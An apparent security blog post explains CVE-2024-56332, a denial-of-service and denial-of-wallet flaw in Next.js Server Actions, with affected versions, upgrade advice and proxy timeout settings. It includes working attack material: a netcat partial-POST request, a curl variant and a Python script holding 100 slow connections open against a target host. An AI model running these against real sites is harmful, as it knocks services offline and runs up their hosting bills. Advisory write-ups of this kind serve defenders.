Next.js is a popular React-based framework, powering thousands of high-traffic sites and applications around the world. But starting with version 13.0.0 and before versions 13.5.8, 14.2.21, and 15.1.2, a critical vulnerability—CVE-2024-56332—opened the door for attackers to easily launch Denial of Service (DoS) and even Denial of Wallet (DoW) attacks against sites using Server Actions.

This post will walk you through the details of this vulnerability, how it works, how you can reproduce and potentially exploit it, and—most importantly—how to secure your Next.js deployments.

What is CVE-2024-56332?

CVE-2024-56332 affects Next.js Server Actions, introduced in v13. These are special functions that run on the server in response to user actions—like form submissions—without requiring you to define separate API endpoints.

A flaw in how Next.js handles requests to Server Actions can allow a malicious user to craft HTTP requests that do not complete (for example, sending a request with an invalid Content-Length header or never actually closing the request body). The Next.js server keeps these requests open—hanging until the hosting provider forcibly closes them due to timeout. During this time, the server isn’t using much CPU or memory but is effectively “busy” waiting for that request.

Why Does This Matter?

- On platforms like Vercel or Netlify, which bill based on the duration of function execution, this can rack up real money—hence, Denial of Wallet (DoW).
- Without strict per-request timeouts, enough of these requests can exhaust available connections or instance concurrency, locking out real users—a classic Denial of Service (DoS).

At a Glance: Affected and Safe Versions

- Affected: Next.js 13.0.0 up to (but not including) 13.5.8, 14.x before 14.2.21, and 15.x before 15.1.2 (if using Server Actions)
- Safe: 13.5.8+, 14.2.21+, and 15.1.2+
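If you manage several deployments, a small version check can help triage. Here's a sketch (a hypothetical helper, not part of Next.js or any official tooling) that tests whether a version string falls in the affected range listed above:

```python
# Hypothetical helper: check whether a Next.js version is affected by
# CVE-2024-56332. First patched release for each affected release line.
PATCHED = {13: (13, 5, 8), 14: (14, 2, 21), 15: (15, 1, 2)}

def is_affected(version: str) -> bool:
    """True if this Next.js version is vulnerable (assuming Server Actions are used)."""
    parts = tuple(int(p) for p in version.split("."))
    major = parts[0]
    if major < 13:
        return False   # Server Actions did not exist before v13
    if major not in PATCHED:
        return False   # later major versions ship with the fix
    return parts < PATCHED[major]

print(is_affected("14.2.20"))  # → True (one release before the patch)
print(is_affected("15.1.2"))   # → False (first patched 15.x release)
```

Run `npx next --version` (or check your lockfile) to get the string to feed it.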

High-Level Attack Idea

An attacker sends a specially crafted HTTP request invoking a Server Action, but the request doesn’t finish (for example: missing/incorrect Content-Length or just never closing the request body). The server keeps the connection open, waiting, burning up a spot in its available pool.

Do this enough times, and you exhaust the slots—legit traffic is blocked, and on metered platforms, your hosting bills spike sky-high.

Simple Exploit Example

Here’s a straightforward way to reproduce the behavior, using netcat, a small Python script, or curl (see below):

Example: Incomplete HTTP POST via netcat

Just replace my-site.com with your actual Next.js deployment.

# Open a raw TCP connection to your server (port 443 for HTTPS, or 80 for HTTP)
nc my-site.com 443

# Then, manually type/paste this minimal HTTP request (with a Server Action route):
POST /api/some-server-action HTTP/1.1
Host: my-site.com
Content-Length: 100

{"foo": "bar"

Notice: We declare Content-Length as 100, but only send a partial body. Then stop sending data, and keep the connection open.

Result: The server will keep waiting for the rest of the body—tying up the function and preventing it (and the connection) from finishing.
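To see this mechanic without touching a real deployment, here's a self-contained sketch. It is not Next.js—just a toy raw-socket server that tries to read the full declared body, plus a client that sends only part of it and then goes silent. The server thread sits blocked in recv() until its own safety timeout fires, which is exactly the "busy waiting" state described above:

```python
import socket
import threading
import time

def toy_server(listener, result):
    """Accept one request and try to read the full declared body."""
    conn, _ = listener.accept()
    data = b""
    while b"\r\n\r\n" not in data:           # read until end of headers
        data += conn.recv(1024)
    headers, _, body = data.partition(b"\r\n\r\n")
    length = next(int(line.split(b":")[1]) for line in headers.split(b"\r\n")
                  if line.lower().startswith(b"content-length"))
    conn.settimeout(2.0)                     # safety timeout for this demo only
    start = time.time()
    try:
        while len(body) < length:            # blocks, waiting for bytes that never come
            chunk = conn.recv(1024)
            if not chunk:
                break
            body += chunk
    except socket.timeout:
        pass
    result["waited"] = time.time() - start
    conn.close()

listener = socket.socket()
listener.bind(("127.0.0.1", 0))
listener.listen(1)
port = listener.getsockname()[1]

result = {}
t = threading.Thread(target=toy_server, args=(listener, result))
t.start()

client = socket.create_connection(("127.0.0.1", port))
# Declare 100 bytes but send only 13, then stop sending
client.sendall(b"POST /action HTTP/1.1\r\nHost: x\r\nContent-Length: 100\r\n\r\n"
               b'{"foo": "bar"')
t.join()
print(f"server blocked for ~{result['waited']:.1f}s waiting for the missing bytes")
client.close()
```

A real vulnerable server without that settimeout() call would sit in the read loop until the platform's infrastructure killed the connection.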

Here’s a small Python script that opens (say, 100) incomplete requests at once:

import socket
import threading
import time

HOST = 'my-site.com'
PORT = 80  # Plain HTTP; for HTTPS (port 443) you'd need to wrap the socket with ssl first
SERVER_ACTION_PATH = '/api/some-server-action'

def slow_post():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    # Declare a 10,000-byte body that we never actually deliver
    req = f"POST {SERVER_ACTION_PATH} HTTP/1.1\r\nHost: {HOST}\r\nContent-Length: 10000\r\n\r\n"
    s.sendall(req.encode())
    # Trickle one byte every 10 seconds to keep the connection alive
    while True:
        s.sendall(b"x")
        time.sleep(10)

for _ in range(100):
    threading.Thread(target=slow_post).start()

> Warning! Never test this on production servers or without explicit permission—it’s a real DoS attack.

Or, Using Curl

curl -X POST https://my-site.com/api/some-server-action \
  -H "Content-Length: 100" \
  --data-binary '{"foo":"bar"'
# Then hit Ctrl+C before it finishes, simulating a hanging request

Why Is This a Big Deal?

- The server is *idle* (low CPU/mem use), but the connection is still "busy" and unavailable for real users
- No rate limiting, per-request timeouts, or buffering? Then it’s just as bad as old HTTP Slowloris attacks
- Your cloud bill can skyrocket on serverless platforms that bill by execution time, since every hung request counts as a long-running invocation

Especially dangerous on unprotected, self-hosted deployments

- Even managed platforms (Vercel, Netlify) rely on default timeouts—drop too many of these, and you still get hit (DoW especially)

The Fix: Upgrade to 13.5.8, 14.2.21, or 15.1.2 (or Higher)

- See: Next.js Changelog

No Workarounds

Officially, no config/patch can block this at the app layer—you must upgrade.

That said, you can limit exposure while you upgrade by:

- Ensuring your hosting provider enforces strict per-request timeouts (Vercel and Netlify both default to roughly 10 seconds per function invocation)
- Configuring upstream load balancers or front proxies (e.g., NGINX, AWS ALB) to close slow, incomplete transfers quickly
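For a self-hosted deployment fronted by NGINX, directives like these close slow or incomplete transfers early. The values and upstream address are illustrative assumptions—tune them for your own traffic:

```nginx
server {
    listen 80;

    # Abort requests whose headers or body trickle in too slowly
    client_header_timeout 10s;  # time allowed to send the full request headers
    client_body_timeout   10s;  # max gap between successive body reads
    send_timeout          10s;  # max gap between successive writes to the client

    location / {
        proxy_pass http://127.0.0.1:3000;  # assumed Next.js upstream
        proxy_read_timeout 30s;
    }
}
```

This doesn't patch the vulnerability—it just bounds how long any one slow request can occupy a connection.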

References and Further Reading

- GitHub Security Advisory: GHSA-5gjw-jcpq-chwh

Next.js Release Notes:

- v13.5.8
- v14.2.21
- v15.1.2

Other resources:

- NIST NVD entry for CVE-2024-56332
- Next.js Server Actions documentation

Are you using Server Actions on Next.js 13+? Upgrade right now!

- There is no official fix for older versions—staying on them leaves your site open to cheap, low-resource DoS and potentially wallet-draining attacks.

If you haven’t already, enable strict timeouts and connection limits in your hosting env.

Stay safe—update fast, and keep your wallet (and your site!) protected.


_This post was written exclusively for security-focused Next.js developers in simple American English. For more, subscribe or check the references above._

Timeline

Published on: 01/03/2025 21:15:13 UTC